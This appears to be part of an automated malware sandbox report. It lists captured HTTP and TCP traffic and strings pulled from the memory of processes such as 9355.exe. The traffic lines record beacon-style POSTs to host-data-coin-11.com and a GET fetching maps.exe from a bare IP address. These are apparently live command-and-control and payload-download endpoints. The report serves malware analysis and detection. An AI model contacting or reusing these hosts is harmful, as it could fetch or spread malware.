                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wumddtukdf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 366Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxloujq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dfxeayag.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /stlr/maps.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.243.44.128
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mkywnx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://peohmenso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uqnmulbyla.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fpvmtbyuw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qsrlhvaju.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hcvyqvy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 350Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://adfmjw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynpnhswfhp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bdqusscd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: host-data-coin-11.com
                      Source: C:\Windows\explorer.exeDNS query: name: bit.ly
                      Source: C:\Windows\explorer.exeDNS query: name: bitly.com
                      Source: global trafficTCP traffic: 192.168.2.3:49792 -> 185.7.214.171:8080
                      Source: global trafficTCP traffic: 192.168.2.3:49844 -> 86.107.197.138:38133
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                      Source: svchost.exe, 00000014.00000003.410290152.0000024EC830D000.00000004.00000001.sdmp, svchost.exe, 00000014.00000002.411547537.0000024EC830E000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                      Source: 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                      Source: 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                      Source: svchost.exe, 00000014.00000003.386303389.0000024EC8393000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.386703941.0000024EC83B4000.00000004.00000001.sdmp, svchost.exe, 00000014.00000003.386033484.0000024EC8371000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: 9355.exe, 0000002B.00000002.527138373.00000000032D0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://service.r
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://support.a
                      Source: 9355.exe, 0000002B.00000002.527501140.00000000033FF000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.528210058.000000000363E000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527999689.000000000357D000.00000004.00000001.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseX
                      Source: 9355.exe, 0000002B.00000002.527163072.00000000032D4000.00000004.00000001.sdmp, 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: 9355.exe, 0000002B.00000002.527048173.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseX
